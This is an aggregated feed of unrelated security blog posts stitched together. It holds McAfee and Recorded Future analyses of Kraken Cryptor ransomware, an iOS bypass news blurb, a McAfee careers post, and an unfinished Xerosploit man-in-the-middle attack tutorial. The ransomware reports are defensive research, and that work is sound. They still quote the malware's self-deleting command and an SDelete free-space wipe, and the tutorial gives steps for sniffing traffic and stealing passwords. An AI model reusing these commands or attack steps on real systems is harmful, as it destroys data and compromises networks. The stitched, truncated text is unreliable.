We have observed that the profit percentage for the developers has decreased from 25% in Version 1 to 20% in Version 2. The developers might have done this to attract more affiliates. To enter the program, potential affiliates must complete a form and pay $50 to be accepted.

In the Kraken forum post it states that the ransomware cannot be used in the following countries:

  • Armenia
  • Azerbaijan
  • Belarus
  • Estonia
  • Georgia
  • Iran
  • Kazakhstan
  • Kyrgyzstan
  • Latvia
  • Lithuania
  • Moldova
  • Russia
  • Tajikistan
  • Turkmenistan
  • Ukraine
  • Uzbekistan

On October 21, Kraken’s authors released Version 2 of the affiliate program, reflecting the ransomware’s popularity and a fresh release. At the same time, the authors published a map showing the distribution of their victims:

Note that some of the countries on the developers’ exclusion list have infections.

Video promotions

The first public release of Kraken Cryptor was Version 1.2; the latest is Version 2.07. To promote the ransomware, the authors created a video showing its capabilities to potential customers. We analyzed the metadata of the video and believe the authors created it along with the first version, released in August.

In the video, the authors show how fast Kraken can encrypt data on the system:

Kraken ransomware in action.

Actor indications

The Advanced Threat Research team and Recorded Future’s Insikt group analyzed all the forum messages posted by ThisWasKraken. Based on the Russian language used in the posts, we believe ThisWasKraken is neither a native Russian nor English speaker. To make forum posts in Russian, the actor likely uses an automated translation service, suggested by the awkward phrasing indicative of such a service. In contrast, the actor is noticeably more proficient in English, though they make mistakes consistently in both sentence structure and spelling. English spelling errors are also noticeable in the ransom note.

ThisWasKraken is likely part of a team that is not directly involved in the development of the ransomware. The actor’s role is customer facing, through the Jabber account thiswaskraken@exploit[.]im. Communications with ThisWasKraken show that the actor refers all technical issues to the product support team at teamxsupport@protonmail[.]com.


Bitcoin is the only currency the affiliate program uses. Insikt Group identified several wallets associated with the operation. Kraken’s developers appear to have choose BitcoinPenguin, an online gambling site as the primary money laundering conduit. It is very uncommon for criminal actors, and specifically ransomware operators, to bypass traditional cryptocurrency exchangers when laundering stolen funds. One of the decisive factors for the unusual choice was likely BitcoinPenguin’s lack of requiring identity verification by its members, allowing anyone to maintain an anonymous cryptocurrency wallet.

Although in response to regulatory demands cryptocurrency exchangers continue to stiffen their registration rules, online crypto casinos do not have to follow the same know-your-customer guidelines, providing a convenient loophole for all kinds of money launderers.

Bitcoin transactions associated with Kraken analyzed with the Crystal blockchain tool. The parent Bitcoin wallet is 3MsZjBte81dvSukeNHjmEGxKSv6YWZpphH.

Kraken Cryptor at work

The ransomware encrypts data on the disk very quickly and uses external tools, such as SDelete from the Sysinternals suite, to wipe files and make file recovery harder.

The Kraken Cryptor infection scheme.

The ransomware has implemented a user account control (UAC) bypass using the Windows Event Viewer. This bypass technique is used by other malware families and is quite effective for executing malware.

The technique is well explained in an article by blogger enigma0x3.

We analyzed an early subset of Kraken ransomware samples and determined they were still in the testing phase, adding and removing options. The ransomware has implemented a “protection” to delete itself during the infection phase:

“C:\Windows\System32\cmd.exe” /C ping -n 3 > NUL&&del /Q /F /S “C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe”

This step is to prevent researchers and endpoint protections from catching the file on an infected machine.

Kraken encrypts user files with a random name and drops the ransom note demanding the victim to pay to recover them. McAfee recommends not paying ransoms because doing so contributes to the development of more ransomware families.

Kraken’s ransom note.

Each file extension is different; this technique is often used by specific ransomware families to bypass endpoint protection systems.

Kraken delivered by the exploit kit bypasses the UAC using Event Viewer, drops a file on the system, and executes it through the UAC bypass method.

The binary delivered by the exploit kit.

The authors of the binary forgot during the compilation of the first versions to delete the PDB reference, revealing that the file has a relationship with Kraken Cryptor:

The early versions contained the following path:


Later versions dropped the PDB path together with the Kraken loader.

Using SysInternals tools

One unique feature of this ransomware family is the use of SDelete. Kraken uses a .bat file to perform certain operations, making file recovery much more challenging:

Kraken downloads SDelete from the Sysinternals website, adds the registry key accepting the EULA to avoid the pop-up, and executes it with the following arguments:

sdelete.exe -c -z C

The SDelete batch file makes file recovery much harder by overwriting all free space on the drive with zeros, deleting the Volume Shadow Copies, disabling the recovery reboot option and finally rebooting the system after 300 seconds.

Netguid comparison

The earlier versions of Kraken were delivered by a loader before it moved to a direct execution method. The loader we examined contained a specific netguid. With this, we found additional samples of the Kraken loader on VirusTotal:

Not only the loader had a specific netguid but the compiled versions of Kraken also shared a netguid, making it possible to continue hunting samples:

Comparing versions

Kraken uses a configuration file in every version to set the variables for the ransomware. This file is easily extracted for additional analysis.

Based on the config file we have discovered nine versions of Kraken:

  • 1.2
  • 1.3
  • 1.5
  • 1.5.2
  • 1.5.3
  • 1.6
  • 2.0
  • 2.0.4
  • 2.0.7

By extracting the config files from all the versions, we built the following overview of features. (The √ means the feature is present.)

All the versions we examined mostly contain the same options, changing only in some of them the antivirtual protection and antiforensic capabilities. The latest version, Kraken 2.0.7, changed its configuration scheme. We will cover that later in this article.

Other differences in Kraken’s config file include the list of countries excluded from encryption. The standouts are Brazil and Syria, which were not named in the original forum advertisement.

Having an exclusion list is a common method of cybercriminals to avoid prosecution. Brazil’s addition to the list in Version 1.5 suggests the involvement of a Brazilian affiliate. The following table shows the exclusion list by country and version. (The √ means the country appears on the list.)

All the Kraken releases have excluded the same countries, except for Brazil, Iran, and Syria.

Regarding Syria: We believe that the Kraken actors have had the same change of heart as the actors behind GandCrab, who recently released decryption keys for Syrian victims after a tweet claimed they had no money to pay the ransoms.


GandCrab’s change of heart regarding Syrian victims.

Version 2.0.7

The most recent version we examined comes with a different configuration scheme:

This release has more options. We expect this malware will be more configurable than other active versions.

APIs and statistics

One of the new features is a public API to track the number of victims:

Public API to track the number of victims. Source: Bleeping Computer.

Another API is a hidden service to track certain statistics:


The Onion URL can be found easily in the binary:

The endpoint and browser Kraken uses is hardcoded in the config file:

Kraken gathers the following information from every infection:

  • Status
  • Operating system
  • Username
  • Hardware ID
  • IP address
  • Country
  • City
  • Language
  • HDCount
  • HDType
  • HDName
  • HDFull
  • HDFree
  • Privilege
  • Operate
  • Beta

Kraken infrastructure

In Versions 1.2 through 2.04 Kraken contacts blasze[.]tk to download additional files. The site has Cloudflare protection to mitigate against DDoS attacks:

The domain is not accessible from many countries:


McAfee coverage

McAfee detects this threat with the following signatures:

  • Artemis!09D3BD874D9A
  • Artemis!475A697872CA
  • Artemis!71F510C40FE5
  • Artemis!99829D5483EF
  • Artemis!CE7606CFDFC0
  • Artemis!F1EE32E471A4
  • RDN/Generic.dx
  • RDN/Generic.tfr
  • RDN/Ransom

Indicators of compromise

Kraken loader hashes

  • 564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd
  • 53a28d3d29e655deca6702c98e71a9bd52a5a6de05524234ab362d27bd71a543

Kraken ransomware samples hashes

  • 047de76c965b9cf4a8671185d889438e4b6150326802e87470d20a3390aad304
  • 0b6cd05bee398bac0000e9d7032713ae2de6b85fe1455d6847578e9c5462391f
  • 159b392ec2c052a26d6718848338011a3733c870f4bf324863901ec9fbbbd635
  • 180406f298e45f66e205bdfb2fa3d8f6ead046feb57714698bdc665548bebc95
  • 1d7251ca0b60231a7dbdbb52c28709a6533dcfc4a339f4512955897c7bb1b009
  • 2467d42a4bdf74147ea14d99ef51774fec993eaef3c11694125a3ced09e85256
  • 2b2607c435b76bca395e4ef4e2a1cae13fe0f56cabfc54ee3327a402c4ee6d6f
  • 2f5dec0a8e1da5f23b818d48efb0b9b7065023d67c617a78cd8b14808a79c0dc
  • 469f89209d7d8cc0188654e3734fba13766b6d9723028b4d9a8523100642a28a
  • 4f13652f5ec4455614f222d0c67a05bb01b814d134a42584c3f4aa77adbe03d0
  • 564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd
  • 61396539d9392ae08b2c9836dd19a58efb541cf0381ea6fef28637aae63084ed
  • 67db0f639d5f4c021efa9c2b1db3b3bc85b2db920859dbded5fed661cc81282d
  • 713afc925973a421ff9328ff02c80d38575fbadaf27a1db0063b3a83813e8484
  • 7260452e6bd05725074ba92b9dc8734aec12bbf4bbaacd43eea9c8bbe591be27
  • 7747587608db6c10464777bd26e1abf02b858ef0643ad9db8134e0f727c0cd66
  • 7e0ee0e707db426eaf25bd0924631db969bb03dd9b13addffbcc33311a3b9aa7
  • 7fb597d2c8ed8726b9a982b2a84d1c9cc2af65345588d42dd50c8cebeee03dff
  • 85c75ac7af9cac6e2d6253d7df7a0c0eec6bdd71120218caeaf684da65b786be
  • 8a0320f3fee187040b1922c6e8bdf5d6bacf94e01b90d65e0c93f01e2abd1e0e
  • 97ed99508e2fae0866ad0d5c86932b4df2486da59fc2568fb9a7a4ac0ecf414d
  • 9c88c66f44eba049dcf45204315aaf8ba1e660822f9e97aec51b1c305f5fdf14
  • a33dab6d7adb83691bd14c88d7ef47fa0e5417fec691c874e5dd3918f7629215
  • b639e26a0f0354515870ee167ae46fdd9698c2f0d405ad8838e2e024eb282e39
  • cae152c9d91c26c1b052c82642670dfb343ce00004fe0ca5d9ebb4560c64703b
  • d316611df4b9b68d71a04ca517dbd94615a77a87f7a8c270d100ef9729a4e122
  • e39d5f664217bda0d95d126cff58ba707d623a58a750b53c580d447581f15af6
  • f7179fcff00c0ec909b615c34e5a5c145fedf8d9a09ed04376988699be9cc6d5
  • f95e74edc7ca3f09b582a7734ad7a547faeb0ccc9a3370ec58b9a27a1a6fd4a7
  • fea3023f06d0903a05096f1c9fc7113bea50b9923a3c024a14120337531180cd
  • ff556442e2cc274a4a84ab968006350baf9897fffd680312c02825cc53b9f455


  • 83b7ed1a0468394fc9661d07b9ad1b787f5e5a85512ae613f2a04a7442f21587
  • b821eb60f212f58b4525807235f711f11e2ef285630604534c103df74e3da81a
  • 0c4e0359c47a38e55d427894cc0657f2f73136cde9763bbafae37c916cebdd2a


  • f34d5f2d4577ed6d9ceec516c1f5a744


  • thiswaskraken@exploit[.]im

Email addresses found in the binaries and configuration files

  • BM-2cUEkUQXNffBg89VwtZi4twYiMomAFzy6o@bitmessage(.)ch
  • BM-2cWdhn4f5UyMvruDBGs5bK77NsCFALMJkR@bitmessage(.)ch
  • nikolatesla@cock(.)li
  • nikolateslaproton@protonmail(.)com
  • oemfnwdk838r@mailfence(.)com
  • onionhelp@memeware(.)net
  • powerhacker03@hotmail(.)com
  • shfwhr2ddwejwkej@tutanota(.)com
  • shortmangnet@420blaze(.)it
  • teamxsupport@protonmail[.]com

Bitcoin address

  • 3MsZjBte81dvSukeNHjmEGxKSv6YWZpphH

PDBs found in the loader samples

  • C:\Users\Krypton\source\repos\UAC\UAC\obj\\Release\UAC.pdb

Associated Filenames

  • C:\ProgramData\Safe.exe C:\ProgramData\EventLog.txt
  • # How to Decrypt Files.html
  • Kraken.exe
  • Krakenc.exe
  • Release.bat
  • <random>.bat
  • Sdelete.exe
  • Sdelete64.exe
  • <random>.exe
  • CabXXXX.exe
  • TarXXXX.exe
  • SUPERAntiSpywares.exe
  • KrakenCryptor.exe
  • 73a94429b321dfc_QiMAWc2K2W.exe
  • auService.exe
  • file.exe
  • bbdefac4e59207._exe
  • Build.exe

Ransomware demo version


Kraken Unique Key

MITRE ATT&CK™ techniques

  • Data compressed
  • Email collection
  • File and directory
  • File deletion
  • Hooking
  • Kernel modules and extensions
  • Modify registry
  • Process injection
  • Query registry
  • Remote system
  • Security software
  • Service execution
  • System information
  • System time

Yara rules

The McAfee Advanced Threat Research team created Yara rules to detect the Kraken ransomware. The rules are available on our Github repository.


The post Fallout Exploit Kit Releases the Kraken Ransomware on Its Victims appeared first on McAfee Blogs.

Kraken Cryptor Ransomware Gains Popularity Among Cybercriminals

Insikt Group

Co-Authored by Marc Rivero López and John Fokker of McAfee

Click here to download the complete analysis as a PDF.

Scope Note: Insikt Group used the Recorded Future product and dark web analysis to track the activity of threat actor ThisWasKraken, who operates the Kraken Cryptor ransomware affiliate program on a top-tier Russian-speaking criminal forum.

Insikt Group collaborated with researchers at McAfee. Ransomware continually represents a major risk to organizations, and the target audience of this research includes day-to-day security practitioners as well as executive decision makers.

Click here to read the McAfee report.

Executive Summary

Kraken Cryptor is a ransomware-as-a-service (RaaS) affiliate program that was introduced on August 16, 2018, on a top-tier Russian-speaking cybercriminal forum by the threat actor ThisWasKraken. Kraken Cryptor has gained popularity among members of the dark web, has been used to target users of the popular antivirus program SuperAntiSpyware, and has also been distributed through the Fallout exploit kit.

Key Judgments

  • The Kraken Cryptor ransomware was first seen in the wild in August 2018.
  • Kraken is distributed by members of an affiliate program operated by ThisWasKraken, who is only active on Russian criminal forums.
  • To distribute malware, ThisWasKraken and/or its affiliates likely use the Fallout exploit kit.
  • We have identified that ThisWasKraken is using online casino BitcoinPenguin to launder illicitly gained funds.
  • Insikt Group assesses with a high degree of confidence that ThisWasKraken works within a team, whose members could be residing in Iran, Brazil, or former Soviet bloc countries.


The Kraken Cryptor ransomware is a connectionless strain of ransomware that communicates with victims via email in place of any command and control (C2) infrastructure or landing pages. Kraken was first observed in the wild in August 2018 and gained notoriety when it was distributed from the compromised website of SuperAntiSpyware, disguised as the antivirus program.1 Kraken has also been distributed to victims via spam and malvertising campaigns, some of which redirect to the Fallout exploit kit for the final installation phase.

Insikt Group has attributed the Kraken Cryptor ransomware to the threat actor ThisWasKraken, who operates the affiliate program that gives other actors access to Kraken for distribution. ThisWasKraken is relatively new to the dark web and is exclusively active on a Russian criminal forum, where the actor registered on August 12, 2018. The actor communicates using Russian and English; however, the analysis of their forum posts indicate that ThisWasKraken is neither a native Russian nor English speaker. To make forum posts in Russian, the actor likely uses automated translation services, as is evident by the awkward phrasing indicative of such a service. In contrast, the actor is noticeably more proficient in English, though they make mistakes consistently in both sentence structure and spelling.

Kraken Cryptor Advertisement

Advertisement for the Kraken Cryptor v2 affiliate program on a criminal forum.

The Kraken Cryptor ransomware is not sold to users on a one-time basis. It is instead operated as an affiliate program that distributes builds of the ransomware to its participants, who in turn repay a percentage of the income earned from ransom payments. This technique of ransomware distribution, known as ransomware-as-a-service (RaaS), is commonly used on the dark web by cybercriminals because of its efficiency. ThisWasKraken calls the service the Kraken Cryptor v2 affiliate program, or Kraken ransomware-as-a-service, which was last updated on October 21. The latest version of the Kraken Cryptor is v.2.0.7.

Kraken Cryptor Ransom Note

Kraken Cryptor ransomware v.2.0.7 ransom note with instructions for how to decrypt infected files.

At the time of this report, the Kraken Cryptor ransomware-as-a-service (RaaS) required all potential affiliate partners to pay $50 per payload. Below are some of the terms and conditions of the affiliate program:

  • Affiliates receive 80 percent of the paid ransom.
  • The program can reject any member or candidate without explanation.
  • Affiliates receive a 24/7 support service.
  • Submitting Kraken sample files to antivirus services is forbidden.
  • The service provides no refunds for purchased payloads.

Kraken Cryptor Ransomware

ThisWasKraken introduced the Kraken Cryptor ransomware on a criminal forum on August 16, 2018.

Threat Analysis

According to ThisWasKraken, the Kraken Cryptor RaaS does not allow the targeting of the following former Soviet bloc countries:

  • Armenia
  • Azerbaijan
  • Belarus
  • Estonia
  • Georgia
  • Kyrgyzstan
  • Kazakhstan
  • Lithuania
  • Latvia
  • Moldova
  • Russia
  • Tajikistan
  • Turkmenistan
  • Ukraine
  • Uzbekistan

In addition to the countries listed above, the latest samples of Kraken that have been identified in the wild no longer affect victims in Syria, Brazil, and Iran, suggesting that ThisWasKraken (or their associates) may have some connection to Brazil and Iran, though this is not confirmed. It is likely that Syria was added following the plea for help from a victim whose computer was infected by another ransomware called GandCrab.

According to the map of infections provided below, we can still see a minor level of infections in excluded countries, despite specific fail-safe controls put in place by Kraken developers.

Each affiliate of Kraken Cryptor RaaS receives a unique build of Kraken and must send the following information to ThisWasKraken to be configured:

  • A primary email address to communicate with victims
  • An alternative email address to communicate with victims
  • A ransom amount in Bitcoin, usually varying from 0.075 to 1.25 BTC
  • A list of countries not to target

The analysis of the actor’s communication suggests that ThisWasKraken is likely part of a team and not personally involved in the development of the ransomware directly. The actor’s role is customer facing, which is accomplished through the Jabber account thiswaskraken@exploit[.]im. Communications with ThisWasKraken show that the actor refers all technical issues to the product support team at the email address teamxsupport@protonmail[.]com.

Bitcoin is the only currency the affiliate program uses, and Insikt Group identified several wallets associated with the operation. Interestingly, it appears that Kraken’s developers choose BitcoinPenguin, an online gambling site, as the primary money laundering conduit. Although not unusual, it is still very uncommon for criminal actors — specifically ransomware operators — to depart from more traditional cryptocurrency exchangers when laundering stolen funds. It is likely that one of the decisive factors for this unusual choice was due to the fact that BitcoinPenguin does not require any identity verification of its members, allowing anyone to maintain an anonymous cryptocurrency wallet there. Cryptocurrency exchangers are continuing to stiffen their registration rules in response to regulatory demands, but online crypto casinos do not have to follow the same “know your customer” (KYC) guidelines, providing a convenient loophole for all kinds of money launderers.

Bitcoin Transactions

Bitcoin transactions associated with Kraken and analyzed with the Crystal Blockchain software.

On October 4, 2018, BleepingComputer reported that the Fallout exploit kit was being used to deliver the Kraken Cryptor ransomware v.1.5. It should be noted that on multiple occasions, ThisWasKraken mentioned the Fallout exploit kit and praised it for its high infection rate. At one point, ThisWasKraken even stated, “One of our partners joined the Fallout exploit kit, which is good for us.” Also, other forum messages indicate that ThisWasKraken purchased hijacked web traffic, which may be the same traffic responsible for Kraken infections from the Fallout exploit kit.

Web Traffic Graphic

Graphic posted by ThisWasKraken showing web traffic used to distribute the Kraken Cryptor RaaS by country.

Below are the technical specifications of the the Kraken Cryptor ransomware v.2.0.7 posted by ThisWasKraken on October 21, 2018:

  • The ransomware is written in C# (NET. Framework v. 3.5).
  • The ransomware works offline and supports communication via email.
  • The size of the payload is around 85 KB, but antivirus analysis indicates that the payload size often reaches up to 94 KB.
  • Kraken primarily targets Windows OS versions 8, 8.1, and 10.
  • Kraken has a high speed of encryption.
  • There is no file size limit for encryption process.
  • The ransomware collects system information when victims are online.
  • Kraken uses a hybrid encryption algorithm, including AES-128/256 (CBC mode), as well as other ciphers (RSA, Salsa20, RC4).
  • The ransomware uses a smart obfuscation encryption method to target random positions of files, including network sharing encryption.
  • The ransomware encrypts storage devices on shared networks.
  • It is impossible to recover without paying the ransom.
  • Anti-debugging and anti-forensics tools are included in the package.
  • Ransom messages are available in 15 languages in HTML and TXT formats.
  • “Canary trap” anti-ransomware bypass methods are applied to identify key leaks.
  • Infection statistics are based on IPs.

Affiliates are given a new build of Kraken every 15 days to keep the payload fully undetectable (FUD) from antivirus software. According to ThisWasKraken, when a victim asks for a free decryption test, the affiliate member should send one of the victim’s files with its associated unique key to the Kraken Cryptor ransomware support service. The service will decrypt the file and resend it to the affiliate member to forward to the victim. After the victim pays the full ransom, the affiliate member sends 20 percent of the received payment to the RaaS to get a decryptor key, which is then forwarded on to the victim. This system ensures the affiliate pays their percentage to the affiliate program and does not simply pocket the full amount for themselves.

Technical Analysis

The following technical analysis was conducted by McAfee’s Advanced Threat Research team and the results were shared with Recorded Future.

The Kraken Cryptor ransomware encrypts data on the disk very quickly and uses external tools, such as SDelete from the Sysinternals Suite, to wipe files, making file recovery harder.

Kraken Cryptor Infection Scheme

The Kraken Cryptor infection scheme through the Fallout exploit kit.

The ransomware implements a user account control (UAC) bypass using the Windows Event Viewer. This bypass technique is used by other malware families and is quite effective for executing malware.

Ransomware Using Windows Event Viewer

The ransomware uses Windows Event Viewer to bypass UAC.

The technique is well explained in an article by blogger enigma0x3.

McAfee analyzed an early subset of Kraken ransomware samples and determined that they were still in the testing phase, adding and removing options. The ransomware implemented a “protection” to delete itself during the infection phase:

  • C:\Windows\System32\cmd.exe” /C ping -n 3 > NUL&&del /Q /F /S
  • C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe

This step is to prevent researchers and endpoint protections from catching the file on an infected machine.

Kraken encrypts user files with a random name and drops the ransom note demanding that the victim pay to recover them. Each file extension is different; this technique is often used by specific ransomware families to bypass endpoint protection systems.

Kraken, delivered by the exploit kit, bypasses the UAC using Event Viewer, drops a file on the system, and executes it through the UAC bypass method.

Exploit Kit Delivering Binary

The binary delivered by the exploit kit.

During the compilation of the first versions, the authors of the binary forgot to delete the PDB reference, revealing that the file has a relationship with Kraken Cryptor.

Ransomware Early Version

An early version of the ransomware with the path on Disk C.

The early versions contained the following path:

  • C:\Users\Krypton\source\repos\UAC\UAC\obj\\Release\UAC.pdb

Later versions “dropped” the PDB path together with the Kraken loader.

Using Sysinternals Tools for Harder File Recovery

One unique feature of this ransomware family is the use of SDelete. Kraken uses a .bat file to perform certain operations, making file recovery much more challenging:

Kraken Cryptor

Kraken Cryptor v.1.6 with SDelete bat file makes file recovery harder.

Kraken downloads SDelete from the Sysinternals website, adds the registry key, accepting the EULA to avoid the pop up, and executes it with the following arguments:
sdelete.exe -c -z C

The SDelete batch file makes file recovery much harder by overwriting all free space on the drive with zeros, deleting the Volume Shadow Copies, disabling the recovery reboot option, and finally, rebooting the system after 300 seconds.

Netguid Comparison

Earlier versions of Kraken were delivered by a loader before it moved to a direct execution method. The loader we examined contained a specific netguid. With this, McAfee found additional samples of the Kraken loader on VirusTotal:

Kraken Cryptor

Additional hash values found on VirusTotal.

Not only did the loader have a specific netguid, but the compiled versions of Kraken also shared a netguid, making it possible to continue hunting samples:

Additional Hash Values

Additional hash values detected.

Comparing Versions

Kraken uses a configuration file in every version to set the variables for the ransomware. This file is easily extracted for additional analysis.

Kraken Cryptor Configuration File

Image of the configuration file of Kraken Cryptor.

Based on the configuration file, McAfee discovered nine versions of Kraken:

  • 1.2
  • 1.3
  • 1.5
  • 1.5.2
  • 1.5.3
  • 1.6
  • 2.0
  • 2.0.4
  • 2.0.7

By extracting the configuration files from all of the versions, McAfee built the following overview of features (the checkmark means the feature is present):

Feature Overview

Overview of the features of all identified versions of the ransomware.

All of the versions we examined mostly contain the same options, differing only in some of the anti-virtual protection and anti-forensic capabilities. The latest version, Kraken 2.0.7, changed its configuration scheme and is covered later.

Other differences in Kraken’s configuration file include the list of countries excluded from encryption. The standouts are Brazil and Syria, which were not named in the original forum advertisement.

Having an exclusion list is a common method for cybercriminals to avoid prosecution. Brazil’s addition to the list in Version 1.5 suggests the involvement of a Brazilian affiliate. The following table shows the exclusion list by country and version (the checkmark means the country appears on the list):

Exclusion List

Exclusion list by country and version indicates the list of countries that are not allowed to attack.

All of the Kraken releases have excluded the same countries, except for Brazil, Iran, and Syria.2

Version 2.0.7

The most recent version examined comes with a different configuration scheme:

Configuration Version

Configuration version of the Kraken Cryptor v. 2.0.7.

This release has more options. McAfee expects this malware will be more configurable than other active versions.

APIs and Statistics

One of the new features is a public API to track the number of victims:

Public API

Public API to track the number of victims. Source: Bleeping Computer

Another API is a hidden service to track certain statistics:

Statistics Collection

Statistics collection and monitoring site that likely does not have the functionality of a typical C2 panel.

The Onion URL can easily be found in the binary:

Detected URL

kraken656kn6wyyx[.]onion URL detected using the API.

The endpoint and browser that Kraken uses is hardcoded in the configuration file:

Configuration File

The configuration file contains data about the endpoint and browser.

Kraken gathers the following information from every infection:

  • Status
  • Operating System
  • Username
  • Hardware ID
  • IP Address
  • Country
  • City
  • Language
  • HDCount
  • HDType
  • HDName
  • HDFull
  • HDFree
  • Privilege
  • Operate
  • Beta

Kraken Infrastructure

In versions 1.2 through 2.04, Kraken contacts blasze[.]tk to download additional files. The site is has Cloudflare protection to mitigate DDoS attacks.

Downloading Additional Files

Kraken Cryptor used blasze[.]tk website to download additional files for versions 1.2 through 2.04.

This domain is not accessible from the following countries:

Countries Blocking Domain

Countries that block the domain blasze[.]tk.

Insikt Group was able to obtain a sample of the Kraken Cryptor ransomware and successfully encrypt and then decrypt a 64-bit Windows 7 machine. The encryption phase locked all target files, and, in those directories, placed a ransom note in HTML format with instructions for the victim. The note first instructs the victim to buy Bitcoin through or, and then to contact the primary or secondary email address listed for further instructions. Obviously, the infected machine still has access to its web browsers, so the victim can communicate with the attacker and pay the ransom.

Ransom Note

Partial screenshot of the ransom note left by Kraken.

When the victim pays the ransom, they receive an email containing a link for the file-sharing service that in turn downloads two files, Decryptor.exe and Private.txt. Private.txt contains two datasets: a private key and a private IV. When the program Decryptor.exe is executed, it requires the victim to copy and paste the private key and private IV into the respective fields in order to decrypt the files on their machine.

Kraken Decryptor

Screenshot of the Kraken decryptor sent to the victim after payment.


The Kraken Cryptor ransomware is a 32-bit malware written using .NET Framework and protected with SmartAssembly, a commercial obfuscator that protects an application against reverse engineering. The malware is fully customizable through a JavaScript Object Notation (JSON) file that is likely generated by its builder.

The existence of the list of countries that are not allowed to be targeted indicates that the members of this possible international hacking group may reside in these nations. Such behavior is usually considered as a security step by the criminals who do not want to be searched by local law enforcement agencies. Considering that ThisWasKraken is not a native English or Russian speaker, the possible residence of the actor may be Brazil or Iran.

To view a full list of the associated indicators of compromise, download the appendix.

1It should be noted that the Kraken Cryptor ransomware is different from the Kraken ransomware widely distributed in 2016, and is not linked to another ransomware strain detected in 2013 that used the “.kraken” extension.

2McAfee believes that the creators of Kraken had the same change of heart as the actors behind GandCrab, who recently released decryption keys for Syrian victims after a tweet claimed they had no money to pay the ransoms.

The post Kraken Cryptor Ransomware Gains Popularity Among Cybercriminals appeared first on Recorded Future.


New iPhone Passcode Bypass Found Hours After Apple Releases iOS 12.1

It's only been a few hours since Apple releases iOS 12.1 and an iPhone enthusiast has managed to find a passcode bypass hack, once again, that could allow anyone to see all contacts' private information on a locked iPhone. Jose Rodriguez, a Spanish security researcher, contacted The Hacker News and confirmed that he discovered an iPhone passcode bypass bug in the latest version of its iOS

Returning to Work? Make it McAfee!

By: Vera, Software Developer

After nine years out of the workplace, I was ready to return to software development. The idea was challenging at first. Would my skills still be valued? Which company would be right for me?

To prepare, I attended seminars and technology deep-dives for people looking to return to software development work. McAfee offered a 12-week, full-time, compensation-based experience program which I was delighted to accept. Designed to help people successfully re-integrate into the workplace after time away, it’s part of McAfee’s strategy to help fill the cybersecurity skills gap and encourage diversity in the technology sector.

Everyone I spoke with at McAfee impressed me as they shared their roles and experiences with the company. I really liked the support, guidance and resources McAfee offered applicants—it gave me the confidence I needed to step back into work. It was clear McAfee would be the perfect starting point for me, my natural first choice when returning to work.

Part of the Team and Learning Fast

Joining McAfee’s Web Security Research software development group in Cork, Ireland, I felt welcome and part of the team from Day One. The culture is inclusive and welcoming, with creativity and new ideas welcomed.

Nine years out of practice and with experience in Java-based software, but none in cybersecurity, I had much to learn. I loved the way everyone in my team was always ready to help and support me.

The team uses the scrum development approach, members collaborating extensively on tasks in two-week sprints. We also use pair programming, working on tasks in pairs.

Scrum and pair programming were both new to me, but I quickly gained a comprehensive understanding of the technologies, techniques and tools as we bounced ideas off one another and addressed challenges together. It was great to develop skills and re-integrate with the workplace so rapidly.

I learned not only about security and McAfee’s solutions, but also about the Linux platforms they run on. I hadn’t done any Unix work since my graduate days, but the team provided support and advice whenever I needed it.

Make the Most of Your Placement

I’d recommend McAfee to anyone looking to return to the workplace. The company has been a great employer and a fantastic way to restart my career. Here are my top five tips for getting the most out of returning to work.

1. Do Your Homework
It’s important to find the right fit for you and your skills. Speak to team members to discover what the company is like, and the products, processes and technologies you’ll be working with.

2. Go Ahead – Apply!
Believe in yourself. You’ve had a good career and responsibilities in the past and your knowledge hasn’t evaporated. You can do even more in the future—I can attest to that. Wherever your next opportunity is, make sure it’s the perfect place to acquire skills and knowledge you may have missed during your time away.

3. Build Your Skills
Expand your expertise through Return to Work seminars and other resources. Review current technologies and thinking. Expand your capabilities and confidence!

4. Extend Your Network
Before and during your time at your placement company, develop connections with relevant people in your team, and in the industry as a whole.

5. Ask Questions
McAfee operates from a foundation of trust and respect. Questions get answers that support progress and development. If you don’t know, ask, either in your team or in your personal development sessions, an integral part of the program.

If you’re apprehensive, don’t worry – that’s normal! I was unsure when I first considered returning to work, especially after such a long break, but now I’m delighted to be back, and even more so to be working with McAfee in a permanent, full-time role.

It’s great to be part of a company that recognizes the capabilities of people who took time out of the workplace, investing time and resources to help us get that all-important foot back in the door. I didn’t know I could do it – now I know I can!

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

Interested in learning more about a career at McAfee? Apply here!

The post Returning to Work? Make it McAfee! appeared first on McAfee Blogs.

Xerosploit- A Man-In-The-Middle Attack Framework

Networking is an important platform for an Ethical Hacker to check on, many of the threat can come from the internal network like network sniffing, Arp Spoofing, MITM e.t.c, This article is on Xerosploit which provides advanced MITM attack on your local network to sniff packets, steal password etc.

Table of Content

  • Introduction to Xerosploit
  • Man-In-The-Middle
  • Xerosploit Installation
  • PSCAN (Port Scanner)
  • DOS (Denial of service)
  • dspoof
  • Driftnet

Introduction to Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.

For those who are not familiar with Man-in-the-middle attack, welcome to the world of internal network attacks


  • nmap
  • hping3
  • build-essential
  • ruby-dev
  • libpcap-dev
  • libgmp3-dev
  • tabulate
  • terminaltables

Built-up with various Features:

  • Port scanning
  • Network mapping
  • Dos attack
  • Html code injection
  • Javascript code injection
  • Download intercaption and replacement
  • Sniffing
  • Dns spoofing
  • Background audio reproduction
  • Images replacement
  • Drifnet
  • Webpage defacement and more 


A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. There are many open source tools available online for this attack like Ettercap, MITMF, Xerosploit, e.t.c


Xerosploit Installation

Xerosploit is an attack tool for MITM which can run only on Linux OS to do so follow the simple steps:-

Open up terminal and type

git clone
cd xerosploit

It will ask to choose your operating system, here we have press 1 for Kali Linux.

Here it will display your network configuration including IP address, MAC address, gateway, and interface and host name. Now run the following command on xerosploit console to know the initial commands:


In this grid we have list of commands for our attack and we are going for man in middle attack, so I will choose scan command in my next step for scanning the whole network.


This command will scan complete network and will found all devices on your network.

As you can observe that it has scanned all the active hosts. There are so many hosts in this network; you have to choose your target from given result. I am going to select for man in middle attack.

 In next comment it will ask for module you want to load for man in middle attack. Go with this comment and type help.


pscan (Port Scanner)

